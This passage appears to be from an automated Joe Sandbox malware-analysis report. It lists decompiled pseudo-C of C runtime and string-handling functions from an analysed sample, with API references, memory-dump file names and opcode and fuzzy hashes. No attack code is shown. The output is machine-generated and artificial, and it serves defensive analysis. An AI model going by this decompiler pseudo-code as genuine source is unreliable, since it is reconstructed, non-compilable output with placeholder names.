                                                      • Part of subcall function 003C3403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000,?,003C387D,00000018,003CB658,0000000C,003C390D), ref: 003C3448
                                                    • _free.LIBCMT ref: 003C666E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID:
                                                    • API String ID: 1020059152-0
                                                    • Opcode ID: 82613907e5d72e7b0b5fd28b8b1b8d33d5d378879fd3d62439dec284f7706e92
                                                    • Instruction ID: e73441144d45ba983c854a8264f75837574d8b732faa97fd5e033e6c40836c94
                                                    • Opcode Fuzzy Hash: 82613907e5d72e7b0b5fd28b8b1b8d33d5d378879fd3d62439dec284f7706e92
                                                    • Instruction Fuzzy Hash: 0711A332505A15ABCB232B74AC0BF593B999F413B1F22892DF945DA2A0DA319D6087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5AFA Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E003C5AFA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x3cb748);
				E003C4440(__ebx, __edi, __esi);
				_t28 = E003C3F5E(__ebx, __edx, __edi, _t31);
				_t12 =  *0x3cdb20; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E003C38F2(_t20, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E003C5AAD(_t29,  *0x3cd5e8);
					 *(_t30 - 4) = 0xfffffffe;
					E003C5B67();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E003C3F5E(_t20, __edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E003C2EDA(_t25, _t26, _t29, _t34);
				}
				return E003C4485(_t29);
			}








                                                    0x003c5afa
                                                    0x003c5afa
                                                    0x003c5afa
                                                    0x003c5afa
                                                    0x003c5afa
                                                    0x003c5afc
                                                    0x003c5b01
                                                    0x003c5b0b
                                                    0x003c5b0d
                                                    0x003c5b15
                                                    0x003c5b39
                                                    0x003c5b3b
                                                    0x003c5b41
                                                    0x003c5b4b
                                                    0x003c5b56
                                                    0x003c5b59
                                                    0x003c5b60
                                                    0x003c5b17
                                                    0x003c5b17
                                                    0x003c5b1b
                                                    0x00000000
                                                    0x003c5b1d
                                                    0x003c5b22
                                                    0x003c5b22
                                                    0x003c5b1b
                                                    0x003c5b25
                                                    0x003c5b27
                                                    0x003c5b29
                                                    0x003c5b2b
                                                    0x003c5b30
                                                    0x003c5b38

                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C5B06
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C5B1D
                                                    • __amsg_exit.LIBCMT ref: 003C5B2B
                                                    • __lock.LIBCMT ref: 003C5B3B
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003C5B4F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 9d715bfdcc7a899b0d3e4258463a9e9dd461c7584e34a8894c74d7a800f24bf1
                                                    • Instruction ID: 83d2b5e482683dbc2de9dfef7718d6a2b0c5bc36eadc48baa1636f17e78ce1cd
                                                    • Opcode Fuzzy Hash: 9d715bfdcc7a899b0d3e4258463a9e9dd461c7584e34a8894c74d7a800f24bf1
                                                    • Instruction Fuzzy Hash: 0EF09032904B109AD627BB695803F4D7AA0AF10725F12810DF458EF1C2CF747D808B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C14F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E003C14F0(void* __ebx, intOrPtr* __ecx, intOrPtr* _a4) {
				void* __esi;
				signed int _t14;
				intOrPtr _t15;
				intOrPtr* _t17;
				char* _t23;
				void* _t34;
				intOrPtr* _t36;
				intOrPtr _t41;
				signed int _t42;
				intOrPtr* _t48;

				_t34 = __ebx;
				_t48 = __ecx;
				_t36 = _a4;
				_t41 =  *((intOrPtr*)(_t36 + 0x10));
				if(_t41 < __ebx) {
					_t14 = E003C2693("invalid string position");
				}
				_t42 = _t41 - _t34;
				if(_t14 < _t42) {
					_t42 = _t14;
				}
				if(_t48 != _t36) {
					if(_t42 > 0xfffffffe) {
						E003C2646("string too long");
					}
					_t15 =  *((intOrPtr*)(_t48 + 0x14));
					if(_t15 >= _t42) {
						if(_t42 != 0) {
							goto L10;
						} else {
							 *(_t48 + 0x10) = _t42;
							if(_t15 < 0x10) {
								_t23 = _t48;
								 *_t23 = 0;
								return _t23;
							} else {
								 *((char*)( *_t48)) = 0;
								return _t48;
							}
						}
					} else {
						E003C1690(_t48, _t42,  *(_t48 + 0x10));
						_t36 = _a4;
						if(_t42 == 0) {
							L22:
							return _t48;
						} else {
							L10:
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
								_t17 = _t48;
							} else {
								_t17 =  *_t48;
							}
							E003C53B0(_t17, _t36 + _t34, _t42);
							 *(_t48 + 0x10) = _t42;
							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
								 *((char*)(_t48 + _t42)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t48 + _t42)) = 0;
								return _t48;
							}
						}
					}
				} else {
					E003C1620(_t14 | 0xffffffff, _t42 + _t34, _t48);
					E003C1620(_t34, 0, _t48);
					return _t48;
				}
			}













                                                    0x003c14f0
                                                    0x003c14f4
                                                    0x003c14f6
                                                    0x003c14fa
                                                    0x003c14ff
                                                    0x003c1506
                                                    0x003c1506
                                                    0x003c150b
                                                    0x003c150f
                                                    0x003c1511
                                                    0x003c1511
                                                    0x003c1515
                                                    0x003c1536
                                                    0x003c153d
                                                    0x003c153d
                                                    0x003c1542
                                                    0x003c1547
                                                    0x003c1572
                                                    0x00000000
                                                    0x003c1574
                                                    0x003c1574
                                                    0x003c157a
                                                    0x003c1589
                                                    0x003c158c
                                                    0x003c1591
                                                    0x003c157c
                                                    0x003c157e
                                                    0x003c1586
                                                    0x003c1586
                                                    0x003c157a
                                                    0x003c1549
                                                    0x003c154f
                                                    0x003c1554
                                                    0x003c1559
                                                    0x003c15c0
                                                    0x003c15c5
                                                    0x003c155b
                                                    0x003c155b
                                                    0x003c1563
                                                    0x003c1565
                                                    0x003c1565
                                                    0x003c156a
                                                    0x003c1594
                                                    0x003c156c
                                                    0x003c156c
                                                    0x003c156c
                                                    0x003c159b
                                                    0x003c15a7
                                                    0x003c15aa
                                                    0x003c15bc
                                                    0x00000000
                                                    0x003c15ac
                                                    0x003c15ae
                                                    0x003c15b7
                                                    0x003c15b7
                                                    0x003c15aa
                                                    0x003c1559
                                                    0x003c1517
                                                    0x003c151d
                                                    0x003c1526
                                                    0x003c1530
                                                    0x003c1530

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C1506
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C153D
                                                      • Part of subcall function 003C2646: std::exception::exception.LIBCMT ref: 003C265B
                                                      • Part of subcall function 003C2646: __CxxThrowException@8.LIBCMT ref: 003C2670
                                                      • Part of subcall function 003C2646: std::exception::exception.LIBCMT ref: 003C2681
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 1823113695-4289949731
                                                    • Opcode ID: 5696d867d1d79e852e5fc0cdb48740383dbc08cfedb9812e2f2dbe87d4e10a6f
                                                    • Instruction ID: addbd049aac94d234c48bff678b0a40e9f04bed44282a4424ecd617a5a14ab7d
                                                    • Opcode Fuzzy Hash: 5696d867d1d79e852e5fc0cdb48740383dbc08cfedb9812e2f2dbe87d4e10a6f
                                                    • Instruction Fuzzy Hash: DE2191723006508BC722DA6CE840F6AF7A99BE37A1F25093EF152CB682D771DC5193A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2530 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E003C2530(void* __eax, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
				void* __esi;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t24;
				void* _t29;
				signed int _t30;
				intOrPtr* _t33;
				intOrPtr* _t37;
				intOrPtr _t39;

				_t37 = __edi;
				_t30 = _a8;
				_t29 = __eax;
				_t17 =  *((intOrPtr*)(_a4 + 0x10));
				if(_t17 < _t30) {
					_t17 = E003C2693("invalid string position");
				}
				_t18 = _t17 - _t30;
				if(_t18 < _t29) {
					_t29 = _t18;
				}
				_t19 =  *((intOrPtr*)(_t37 + 0x10));
				if((_t30 | 0xffffffff) - _t19 <= _t29) {
					_t19 = E003C2646("string too long");
				}
				if(_t29 == 0) {
					L17:
					return _t37;
				} else {
					_t39 = _t19 + _t29;
					if(E003C15D0(_t39) == 0) {
						L16:
						goto L17;
					} else {
						_t33 = _a4;
						if( *((intOrPtr*)(_t33 + 0x14)) >= 0x10) {
							_t33 =  *_t33;
						}
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t24 = _t37;
						} else {
							_t24 =  *_t37;
						}
						E003C53B0( *((intOrPtr*)(_t37 + 0x10)) + _t24, _t33 + _a8, _t29);
						 *((intOrPtr*)(_t37 + 0x10)) = _t39;
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							 *((char*)(_t37 + _t39)) = 0;
							goto L16;
						} else {
							 *((char*)( *_t37 + _t39)) = 0;
							return _t37;
						}
					}
				}
			}













                                                    0x003c2530
                                                    0x003c2533
                                                    0x003c2537
                                                    0x003c253c
                                                    0x003c2541
                                                    0x003c2548
                                                    0x003c2548
                                                    0x003c254d
                                                    0x003c2551
                                                    0x003c2553
                                                    0x003c2553
                                                    0x003c2555
                                                    0x003c255f
                                                    0x003c2566
                                                    0x003c2566
                                                    0x003c256d
                                                    0x003c25c9
                                                    0x003c25cd
                                                    0x003c256f
                                                    0x003c2570
                                                    0x003c257c
                                                    0x003c25c8
                                                    0x00000000
                                                    0x003c257e
                                                    0x003c257e
                                                    0x003c2589
                                                    0x003c258b
                                                    0x003c258b
                                                    0x003c2590
                                                    0x003c2596
                                                    0x003c2592
                                                    0x003c2592
                                                    0x003c2592
                                                    0x003c25a3
                                                    0x003c25af
                                                    0x003c25b2
                                                    0x003c25c4
                                                    0x00000000
                                                    0x003c25b4
                                                    0x003c25b6
                                                    0x003c25bf
                                                    0x003c25bf
                                                    0x003c25b2
                                                    0x003c257c

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C2548
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C2566
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 963545896-4289949731
                                                    • Opcode ID: 309a898ff658ab926207cdb5784128560c426dba34079e2cad682d94684a1d1a
                                                    • Instruction ID: d0093f2997ea3e124455596b9e2d49b919441ea947843e93f40e49e7db5260b7
                                                    • Opcode Fuzzy Hash: 309a898ff658ab926207cdb5784128560c426dba34079e2cad682d94684a1d1a
                                                    • Instruction Fuzzy Hash: 11119D313002019BCB06EE6CD8A0F6BF3A9BB5A310F14052DF512CB281E760ED94C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E003C1620(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _t9;
				void* _t10;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t22;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t22 = __ecx;
				_t28 = __eax;
				_t9 =  *((intOrPtr*)(__esi + 0x10));
				if(_t9 < __ecx) {
					_t9 = E003C2693("invalid string position");
				}
				_t10 = _t9 - _t22;
				if(_t10 < _t28) {
					_t28 = _t10;
				}
				if(_t28 == 0) {
					L14:
					return _t29;
				} else {
					_t25 =  *((intOrPtr*)(_t29 + 0x14));
					if(_t25 < 0x10) {
						_t18 = _t29;
					} else {
						_t18 =  *_t29;
					}
					if(_t25 < 0x10) {
						_t26 = _t29;
					} else {
						_t26 =  *_t29;
					}
					E003C2850(_t26 + _t22, _t18 + _t22 + _t28, _t10 - _t28);
					_t15 =  *((intOrPtr*)(_t29 + 0x10)) - _t28;
					 *((intOrPtr*)(_t29 + 0x10)) = _t15;
					if( *((intOrPtr*)(_t29 + 0x14)) < 0x10) {
						 *((char*)(_t29 + _t15)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t29 + _t15)) = 0;
						return _t29;
					}
				}
			}












                                                    0x003c1620
                                                    0x003c1620
                                                    0x003c1621
                                                    0x003c1623
                                                    0x003c1628
                                                    0x003c162f
                                                    0x003c162f
                                                    0x003c1634
                                                    0x003c1638
                                                    0x003c163a
                                                    0x003c163a
                                                    0x003c163e
                                                    0x003c168c
                                                    0x003c168f
                                                    0x003c1640
                                                    0x003c1640
                                                    0x003c1647
                                                    0x003c164d
                                                    0x003c1649
                                                    0x003c1649
                                                    0x003c1649
                                                    0x003c1652
                                                    0x003c1658
                                                    0x003c1654
                                                    0x003c1654
                                                    0x003c1654
                                                    0x003c1665
                                                    0x003c1670
                                                    0x003c1676
                                                    0x003c167a
                                                    0x003c1688
                                                    0x00000000
                                                    0x003c167c
                                                    0x003c167e
                                                    0x003c1685
                                                    0x003c1685
                                                    0x003c167a

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C162F
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • _memmove.LIBCMT ref: 003C1665
                                                    Strings
                                                    • invalid string position, xrefs: 003C162A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                    • String ID: invalid string position
                                                    • API String ID: 1785806476-1799206989
                                                    • Opcode ID: df95fb8069069136c6695de64e7056b1710d52f3fc304c7420303322c9b73b4a
                                                    • Instruction ID: 9f45270dcc47a5782154065f30c1545a19d21552cc29eddaf2c45e5a3f4d6488
                                                    • Opcode Fuzzy Hash: df95fb8069069136c6695de64e7056b1710d52f3fc304c7420303322c9b73b4a
                                                    • Instruction Fuzzy Hash: BF0167313106004BD727996CDC90F1BB2E69BD670476D492CD491CBB4AD7B1DC525794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C7C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E003C7C25(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E003C770A(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E003C3F5E(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E003C3F5E(__ebx, __edx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E003C76E3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E003C79BD(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                    0x003c7c25
                                                    0x003c7c28
                                                    0x003c7c2e
                                                    0x003c7c3c
                                                    0x003c7c42
                                                    0x003c7c4a
                                                    0x003c7c56
                                                    0x003c7c5e
                                                    0x003c7c66
                                                    0x003c7c7a
                                                    0x003c7c7c
                                                    0x003c7c80
                                                    0x003c7c85
                                                    0x003c7c8b
                                                    0x003c7c8d
                                                    0x003c7c8f
                                                    0x003c7c92
                                                    0x00000000
                                                    0x003c7c99
                                                    0x003c7c8d
                                                    0x003c7c80
                                                    0x003c7c7a
                                                    0x003c7c66
                                                    0x003c7c9a

                                                    APIs
                                                      • Part of subcall function 003C770A: __getptd.LIBCMT ref: 003C7710
                                                      • Part of subcall function 003C770A: __getptd.LIBCMT ref: 003C7720
                                                    • __getptd.LIBCMT ref: 003C7C34
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C7C42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: csm
                                                    • API String ID: 803148776-1018135373
                                                    • Opcode ID: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                    • Instruction ID: 1c8d6fee6a95e4a7dff1bbe455c98d42ee7c03fdf5e1f07e90e073e03889a550
                                                    • Opcode Fuzzy Hash: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                    • Instruction Fuzzy Hash: 4E014B74808306CACF36AF25C444FACB3B5BF10311F15882EE845DA251DB318D90CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    Function 02FA1738 Relevance: 7.9, Strings: 6, Instructions: 439COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (m$,$d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-3745195359
                                                    • Opcode ID: 377add88d1dc2bbd10997cf1466f756c1439e0077996bc7b21c7fdef36df3f39
                                                    • Instruction ID: 37e33174c02027846c6c1366715babd21912f97b914232b42cc15b520c5c1392
                                                    • Opcode Fuzzy Hash: 377add88d1dc2bbd10997cf1466f756c1439e0077996bc7b21c7fdef36df3f39
                                                    • Instruction Fuzzy Hash: C502CB70B002049FDB24EFA8D454BAAB7A7EF85318F118928D5169F3A4CF74EC85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA1728 Relevance: 6.6, Strings: 5, Instructions: 331COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,$d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-3257364843
                                                    • Opcode ID: 31d35e2f4d3209fc66749e1e971cdbfb850dbea0ca747fe669418867ae9c2116
                                                    • Instruction ID: f51c051a6fd5305c3907a7e6cfa7ae09d817abe5430d81958972433ae0eaedd1
                                                    • Opcode Fuzzy Hash: 31d35e2f4d3209fc66749e1e971cdbfb850dbea0ca747fe669418867ae9c2116
                                                    • Instruction Fuzzy Hash: F6D1B970B002009FDB24EBA8D454BAAB7E7AF85318F25896CD5169F3A1DF74DC45CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA195E Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-2348408925
                                                    • Opcode ID: 802dc699c086f41ec3b66e1d098e631502d27425733d75dffeef0ed4f6c11669
                                                    • Instruction ID: 25ffd9e578cb04e998755c96deb62c1caf92af22e2309bfbb44b2bd5e6c7f011
                                                    • Opcode Fuzzy Hash: 802dc699c086f41ec3b66e1d098e631502d27425733d75dffeef0ed4f6c11669
                                                    • Instruction Fuzzy Hash: 77619A707002009FDB24EFA8D454BAAB7EBEB85318F11896CD5169F3A1DF74EC458B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA1040 Relevance: 2.6, Strings: 2, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TSHl$TSHl
                                                    • API String ID: 0-2025614696
                                                    • Opcode ID: e276b150e8f083ab6c3f8d2f0c05b422e3f2f7537420cc4172a021ab9c84669b
                                                    • Instruction ID: a5c699c793919da4378873156917eb7dcf8209a0275e215e5e7b4b0142f68cfd
                                                    • Opcode Fuzzy Hash: e276b150e8f083ab6c3f8d2f0c05b422e3f2f7537420cc4172a021ab9c84669b
                                                    • Instruction Fuzzy Hash: BA11ADB4B00208CFCB54EBB9D8559AEB7FAEF89648B054478C50ADB350EB35DC45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA1031 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TSHl
                                                    • API String ID: 0-2004172670
                                                    • Opcode ID: 54611d85e8bb701fca52a918966b80d7e5038e0e826ae52d4efcb16082808358
                                                    • Instruction ID: ee87f1c5e4f6be85ebca82106994ebeebc1dbcdc7016b17fd8ba043e6368809b
                                                    • Opcode Fuzzy Hash: 54611d85e8bb701fca52a918966b80d7e5038e0e826ae52d4efcb16082808358
                                                    • Instruction Fuzzy Hash: 1E118CB4A00204CFCB54DBB9D8959AAB7F6FF89348B0548A9C51ADB320EB35DD45CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA12C5 Relevance: .5, Instructions: 538COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
